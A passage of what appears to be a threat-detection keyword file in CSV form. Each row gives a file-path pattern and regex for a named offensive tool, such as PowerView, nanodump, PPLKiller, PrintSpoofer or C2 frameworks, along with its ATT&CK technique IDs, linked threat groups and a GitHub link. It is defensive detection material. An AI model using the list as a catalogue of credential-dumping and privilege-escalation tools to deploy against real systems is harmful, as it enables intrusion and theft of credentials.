interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","8","4","327","109","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z" "*/PowerSharpPack.git*",".{0,1000}\/PowerSharpPack\.git.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*/powershell/process_injection/*",".{0,1000}\/powershell\/process_injection\/.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*/powershell_executor/*.go*",".{0,1000}\/powershell_executor\/.{0,1000}\.go.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*/PowershellKerberos.git*",".{0,1000}\/PowershellKerberos\.git.{0,1000}","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","1","N/A","9","3","293","42","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" "*/PowershellTools.git*",".{0,1000}\/PowershellTools\.git.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","1","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*/PowerShx.git*",".{0,1000}\/PowerShx\.git.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","274","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" "*/PowerTools.ps1*",".{0,1000}\/PowerTools\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","1","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*/PowerUp.ps1*",".{0,1000}\/PowerUp\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/PowerView.cna*",".{0,1000}\/PowerView\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*/powerview.ps1*",".{0,1000}\/powerview\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/PowerView.ps1*",".{0,1000}\/PowerView\.ps1.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","10","10","921","179","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z" "*/PowerView3.cna*",".{0,1000}\/PowerView3\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*/PPEnum/*",".{0,1000}\/PPEnum\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","N/A","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","1","96","8","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z" "*/ppid_spoofing.exe*",".{0,1000}\/ppid_spoofing\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/ppl/ppl.c*",".{0,1000}\/ppl\/ppl\.c.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*/ppl_dump.*",".{0,1000}\/ppl_dump\..{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*/PPLBlade.git*",".{0,1000}\/PPLBlade\.git.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","1","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "*/ppldump.*",".{0,1000}\/ppldump\..{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","136","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*/PPLDump_BOF/*",".{0,1000}\/PPLDump_BOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","136","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*/PPLFault/*",".{0,1000}\/PPLFault\/.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*/PPLKiller.git*",".{0,1000}\/PPLKiller\.git.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","9","815","130","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" "*/PPLKiller/*",".{0,1000}\/PPLKiller\/.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","9","815","130","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" "*/PPLmedic.exe*",".{0,1000}\/PPLmedic\.exe.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","1","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*/PPLmedic.git*",".{0,1000}\/PPLmedic\.git.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","1","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*/pptp-version.nse*",".{0,1000}\/pptp\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/prefetch-tool.git*",".{0,1000}\/prefetch\-tool\.git.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","1","N/A","8","1","47","7","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z" "*/prepare.sh shell/mod_*.htaccess*",".{0,1000}\/prepare\.sh\sshell\/mod_.{0,1000}\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*/PrimusC2*",".{0,1000}\/PrimusC2.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","50","4","2024-04-12T15:25:40Z","2023-04-19T10:59:30Z" "*/PrimusC2.git*",".{0,1000}\/PrimusC2\.git.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","50","4","2024-04-12T15:25:40Z","2023-04-19T10:59:30Z" "*/printerbug.py*",".{0,1000}\/printerbug\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/printerbug.py*",".{0,1000}\/printerbug\.py.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","1013","157","2023-12-21T08:48:34Z","2019-01-08T18:42:07Z" "*/printernightmare.ps1*",".{0,1000}\/printernightmare\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","9","4","N/A","N/A","N/A","N/A" "*/PrintMonitorDll.*",".{0,1000}\/PrintMonitorDll\..{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","247","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" "*/PrintMonitorDll/*",".{0,1000}\/PrintMonitorDll\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","247","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" "*/printnightmare.py*",".{0,1000}\/printnightmare\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/PrintSpoofer.exe*",".{0,1000}\/PrintSpoofer\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*/PrintSpoofer.git*",".{0,1000}\/PrintSpoofer\.git.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*/PrintSpoofer.git*",".{0,1000}\/PrintSpoofer\.git.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*/PrintSpoofer/*",".{0,1000}\/PrintSpoofer\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crisprss/PrintSpoofer","1","1","N/A","10","10","84","10","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z" "*/Priv_Esc.sh*",".{0,1000}\/Priv_Esc\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*/Privesc.git*",".{0,1000}\/Privesc\.git.{0,1000}","offensive_tool_keyword","Privesc","Windows PowerShell script that finds misconfiguration issues which can lead to privilege escalation","T1068 - T1548 - T1082 - T1078","TA0004","N/A","N/A","Privilege Escalation","https://github.com/enjoiz/Privesc","1","1","N/A","10","5","469","90","2023-03-06T10:27:00Z","2015-11-19T13:22:01Z" "*/privesc.ps1*",".{0,1000}\/privesc\.ps1.{0,1000}","offensive_tool_keyword","Privesc","Windows PowerShell script that finds misconfiguration issues which can lead to privilege escalation","T1068 - T1548 - T1082 - T1078","TA0004","N/A","N/A","Privilege Escalation","https://github.com/enjoiz/Privesc","1","1","N/A","10","5","469","90","2023-03-06T10:27:00Z","2015-11-19T13:22:01Z" "*/privesc/*",".{0,1000}\/privesc\/.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/PrivescCheck*",".{0,1000}\/PrivescCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*/PrivescCheck.ps1*",".{0,1000}\/PrivescCheck\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/PrivExchange*",".{0,1000}\/PrivExchange.{0,1000}","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","947","174","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" "*/PrivExchange.git*",".{0,1000}\/PrivExchange\.git.{0,1000}","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","947","174","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" "*/privexchange.py*",".{0,1000}\/privexchange\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/PrivFu.git*",".{0,1000}\/PrivFu\.git.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*/PrivilegeEscalation/*",".{0,1000}\/PrivilegeEscalation\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group 